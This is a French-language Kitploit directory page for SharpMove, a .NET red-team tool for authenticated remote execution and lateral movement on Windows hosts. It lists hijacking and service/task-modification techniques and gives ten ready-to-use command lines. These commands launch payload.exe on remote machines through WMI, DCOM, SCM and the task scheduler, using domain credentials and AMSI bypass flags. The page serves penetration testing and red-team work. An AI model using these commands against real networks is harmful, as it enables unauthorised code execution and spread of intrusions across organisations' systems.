Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
SharpMove — Projet .NET pour l'exécution distante authentifiée | Kitploit
Outils/GitHubGitHub/0xthirteen/sharpmove
Mouvement LatéralPost-ExploitationTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHub0xthirteen/sharpmove

SharpMove

Projet .NET pour l'exécution distante authentifiée

Voir le dépôt
41070il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

SharpMove - Exécution .NET authentifiée pour des hôtes distants

Compilation

Pour compiler, ouvrez le projet dans Visual Studio et compilez pour la version Release.

Options

  • WMI
  • SCM
  • DCOM (Multiple)
  • Planificateur de tâches
  • Détournement de DLL de service
  • Détournement de serveur DCOM
  • Modifier une tâche planifiée
  • Modifier le chemin binaire du service
root@kitploit:~
SharpMove.exe action=query computername=remote.host.local query="select * from win32_process" username=domain\user password=password
root@kitploit:~
SharpMove.exe action=create computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true username=domain\user password=password
root@kitploit:~
SharpMove.exe action=executevbs computername=remote.host.local eventname=Debug amsi=true username=domain\\user password=password
root@kitploit:~
SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password
root@kitploit:~
SharpMove.exe action=dcom computername=remote.host.local command="C:\windows\temp\payload.exe\" method=ShellBrowserWindow amsi=true
root@kitploit:~
SharpMove.exe action=scm computername=remote.host.local command="C:\windows\temp\payload.exe" servicename=WindowsDebug amsi=true
root@kitploit:~
SharpMove.exe action=modsvc computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true servicename=TestService
root@kitploit:~
SharpMove.exe action=modschtask computername=remote.host.local command="C:\windows\temp\payload.exe" username=domain\user password=password taskname=TestTask
root@kitploit:~
SharpMove.exe action=hijackdcom computername=remote.host.local clsid={40bdc4e5-d532-42e6-b667-1ab890fdebcf}
root@kitploit:~
SharpMove.exe action=startservice computername=remote.host.local servicename=TestService

Partie de MoveKit

Télécharger l’outil